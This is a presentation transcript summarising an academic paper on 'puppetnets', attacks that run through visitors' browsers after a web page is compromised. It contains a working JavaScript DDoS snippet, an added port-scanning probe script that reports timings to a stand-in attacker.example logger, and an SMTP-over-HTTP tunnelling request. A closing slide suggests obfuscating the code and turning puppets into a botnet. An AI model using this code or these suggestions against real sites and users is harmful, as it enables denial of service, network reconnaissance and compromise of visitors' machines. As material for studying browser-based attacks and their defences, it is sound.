
Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure

Paper by V.T. Lam, S. Antonatos, P. Akritidis and K.G. Anagnostakis. Conference: ACM Conference on Computer and Communications Security (CCS) 2006. Presented by Ramanarayanan Ramani.





Presentation Transcript


  1. Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure. Paper by: V.T. Lam, S. Antonatos, P. Akritidis, K.G. Anagnostakis. Conference: ACM Conference on Computer and Communications Security 2006. Presented by: Ramanarayanan Ramani

  2. Scenario
  1. The attacker compromises a web server.
  2. The attacker embeds malicious code in a web page on that server.
  3. Clients access the web page and their browsers execute the malicious code.
  The clients are the puppets: they can be controlled only for as long as they keep the web page open in the browser.

  3. Puppetnet vs Botnet
  • Not heavily dependent on the exploitation of specific implementation flaws: the puppet simply runs the page's script as designed, so no browser exploit is required
  • The attacker does not have complete control over the actions of the participating nodes
  • Participation in puppetnets is more dynamic: a node joins when it loads the page and leaves when it closes it

  4. Overview
  • Attack scenarios using puppetnets
  • Analysis of the attack scenarios
  • Defense against puppetnets
  • Paper review
  • Suggestions

  5. DDoS (Distributed Denial of Service)

  6. DDoS
  • Sample code: every second the puppet re-points a hidden image at a URL on the victim, so each open browser contributes one request per second for as long as the page stays open.

    <script type="text/javascript">
      setTimeout(pingVictim, 1000);
      function pingVictim() {
        var image1 = document.getElementById('img1');
        // A fresh query string defeats the browser cache; assigning the same
        // src twice would otherwise not send a second request to the victim.
        image1.src = "http://www.victim.com/badurl.jpg?" + Math.random();
        setTimeout(pingVictim, 1000);
      }
    </script>
    <body>
      <img id="img1" />
    </body>

  7. Worm Propagation

  8. Worm Propagation
  • Embed the worm code in the web page
  • Each puppet scans for vulnerable hosts and tries to propagate the worm code
  • If outbound connections from the compromised server are blocked, the worm can still propagate through the web page, carried by the puppets
  • A client behind a NAT/firewall can propagate the worm inside the protected network that the attacker cannot reach directly

  9. Reconnaissance probes

  10. Reconnaissance probes
  • Problem: browsers refuse access to the contents of an inline frame unless the source of the frame is in the same domain as the parent page, so the puppet cannot read the probe's response
  • Solution: "sandwich" the probe request between two requests to the malicious web site, chaining the three requests with onLoad/onError event handlers; the malicious site never sees the probe itself, but the time between the two requests it does see reveals how long the probe took, and therefore how the target responded
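An added example (not code from the paper or the slides) of the sandwich: the puppet-side chain that a browser would run, and the attacker-side inference that turns the gap between the two bracketing requests into a port state. The attacker hostname, the log format and the timing thresholds are assumptions; the thresholds in particular depend on the network and on what the probed listener does with an HTTP request.

```javascript
// Added example (not from the paper or the slides): the "sandwich" probe.
// The puppet cannot read a cross-origin frame, but it can chain requests:
//   A1 -> attacker site, then P -> probe target, then A2 -> attacker site.
// The attacker's logger never sees P, only A1 and A2; the gap between them
// is roughly how long the browser spent on P, which leaks whether the
// target host/port answered, refused, or silently dropped the connection.
// Hostnames and thresholds below are placeholders (assumptions).

const ATTACKER = "http://attacker.example"; // assumption: attacker-controlled logger

// Puppet side (browser only): onload and onerror both fire for cross-origin
// images, so the chain advances whether the probe succeeds or fails.
function sandwichProbe(probeUrl, puppetId) {
  const a1 = new Image();
  a1.onload = a1.onerror = () => {
    const probe = new Image();
    probe.onload = probe.onerror = () => {
      const a2 = new Image();
      a2.src = `${ATTACKER}/t?id=${puppetId}&m=A2&r=${Math.random()}`;
    };
    probe.src = probeUrl; // e.g. http://10.0.0.5:8080/x.gif inside the puppet's LAN
  };
  a1.src = `${ATTACKER}/t?id=${puppetId}&m=A1&r=${Math.random()}`;
}

// Attacker side: classify the A1->A2 gap. Assumed LAN thresholds: a refused
// connection (RST) comes back within tens of ms, an open port answers within
// a couple of seconds even if it answers with garbage, and a filtered port only
// returns when the browser's connect timeout expires.
function classifyGap(gapMs, { refusedMax = 100, openMax = 2000 } = {}) {
  if (gapMs < refusedMax) return "closed";
  if (gapMs < openMax) return "open";
  return "filtered";
}

// logLines: constructed logger output, one "ts_ms puppetId marker" per hit.
function inferFromLog(logLines) {
  const seen = new Map(); // puppetId -> { A1, A2 } timestamps
  for (const line of logLines) {
    const [ts, id, marker] = line.trim().split(/\s+/);
    if (!seen.has(id)) seen.set(id, {});
    seen.get(id)[marker] = Number(ts);
  }
  const result = {};
  for (const [id, t] of seen) {
    // A puppet that never sent A2 (page closed mid-probe) yields no verdict.
    if (t.A1 !== undefined && t.A2 !== undefined) {
      result[id] = classifyGap(t.A2 - t.A1);
    }
  }
  return result;
}

// Constructed sample: three puppets probing three different ports, plus one
// puppet that navigated away before A2.
const SAMPLE_LOG = [
  "1000 p1 A1", "1030 p1 A2",   // 30 ms gap  -> closed (RST came straight back)
  "2000 p2 A1", "2350 p2 A2",   // 350 ms gap -> open (listener answered something)
  "3000 p3 A1", "24000 p3 A2",  // 21 s gap   -> filtered (connect timeout)
  "4000 p4 A1",                 // no A2      -> no verdict
];

if (typeof window === "undefined") {
  console.log(inferFromLog(SAMPLE_LOG));
}
```

The puppet never learns the result; only the attacker's server does, which is the point of the sandwich. Because the verdict rests purely on timing, jitter and the probed service's own behaviour (an HTTP server on the target returns quickly with 404, a raw TCP service may hold the connection open) move results between classes, so thresholds need calibrating per network.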

  11. Protocols other than HTTP
  • Limitation of puppetnets: bound to use HTTP, since the browser speaks nothing else
  • Solution: tunnel SMTP/IRC/FTP... by wrapping the protocol messages inside the HTTP message; a line-oriented server rejects the HTTP request line and headers as unknown commands, then acts on the embedded commands that follow. Example for SMTP:

    GET /index.html HTTP/1.1
    Host: www.example.com:25
    HELO mydomain.com
    …

  • Caveat (editor's note): current browsers refuse to connect to a list of well-known non-HTTP ports, 25 among them, so this only works against services on ports outside that list

  12. Exploiting cookie-authenticated services
  Constraints:
  • The inline frame needs to be able to post cookies; at the time of the paper this worked on Firefox but not on IE
  • The attacker must know the structure and content of the form to be posted, as well as the target URL
  • The attacker must be able to instruct browsers to automatically post such forms (supported by all browsers)

  13. Distributed malicious computations
  • Can be done through JavaScript, ActiveX or Java applets
  • ActiveX: produces an 'Accept' or 'Deny' box
  • Applets: instantiate a JVM, but can be placed in hidden frames
  • Script: slower, but can be hidden
  • Example: MD5 computation
  • JavaScript: 380 checksums/sec
  • Applet: 434K checksums/sec
  • A 1,000-node puppetnet can crack an MD5 hash as fast as a 128-node cluster

  14. Analysis - DDoS

  15. Analysis - DDoS

  16. Analysis - DDoS
  • Two types of attacks:
  • A simple attack aiming to maximize the number of SYN packets (maxSYN)
  • One aiming to maximize the ingress bandwidth consumed at the victim (maxURL)

  17. Analysis - DDoS (table not in transcript; figures are an estimate for a 1000-node puppetnet)

  18. Analysis – Worm Propagation: CodeRed Worm
  • CodeRed attacks the IIS web server
  • The model assumes a vulnerable population of 360,000 hosts and a server scanning rate of 358 scans/min
  • Browsers (puppets) performing 36 scans/min

  19. Analysis – Worm Propagation: CodeRed Worm

  20. Analysis – Worm Propagation: CodeRed Worm

  21. Analysis - Reconnaissance probes

  22. Analysis - Reconnaissance probes

  23. Defense
  • Disabling JavaScript
  • Careful implementation of existing defenses
  • Filtering using attack signatures
  • Client-side behavioral controls
  • Server-side controls and puppetnet tracing
  • Server-directed client-side controls

  24. Advantages
  • A simple and very effective attack
  • Lightweight compared to a botnet
  • Uses HTTP, which makes detection difficult

  25. Disadvantages
  • No complete control over the client
  • Tough to compromise web servers (the paper does not explain how to do it)
  • The View Source command on the HTML page will reveal the puppetnet code

  26. Suggestions
  • Look into hiding the code using encoding, or embedding the code in objects such as Flash
  • Use the puppetnet to install a bot on the client machine, turning puppets into a botnet
  • Provide ideas on how to compromise the web server

  27. Questions?
